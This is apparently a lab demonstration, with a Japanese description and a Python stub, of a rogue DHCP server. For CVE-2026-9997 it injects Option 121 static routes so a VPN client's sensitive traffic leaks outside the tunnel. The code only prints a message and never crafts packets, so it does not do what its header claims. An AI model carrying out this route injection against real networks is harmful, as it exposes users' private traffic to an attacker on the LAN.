
CVE-2026-9997 向けの不正な DHCP サーバー:VPN クライアントに Option 121 スタティックルートを注入することで、スプリットトンネリングをバイパスして機密トラフィックを外部に漏えいさせます。
#!/usr/bin/env python3
# rogue_dhcp_server.py - Injects a static route to bypass VPN split tunnel
import socket, struct, threading
def send_dhcp_offer(client_mac, offer_ip):
# Craft a DHCP OFFER packet with Option 121 (Classless Static Route)
# This option adds a route that sends traffic to a sensitive subnet via the attacker's gateway.
# We'll simulate by creating a raw packet (simplified).
# In a real attack, we'd use scapy; here we just demonstrate the concept.
print(f"Sending DHCP OFFER to {client_mac} with malicious static route...")
# The client would then apply this route and leak traffic.
企業のVPNクライアントは、ローカルネットワークから受け取るDHCPオプション(オプション121 – クラスレス静的ルート)を検証なしで受け入れます。同じLAN上の攻撃者は、暗号化されたVPNトンネルの外に機密トラフィックを送信するルートを注入できます。
python rogue_dhcp_server.py
python vpn_client_sim.py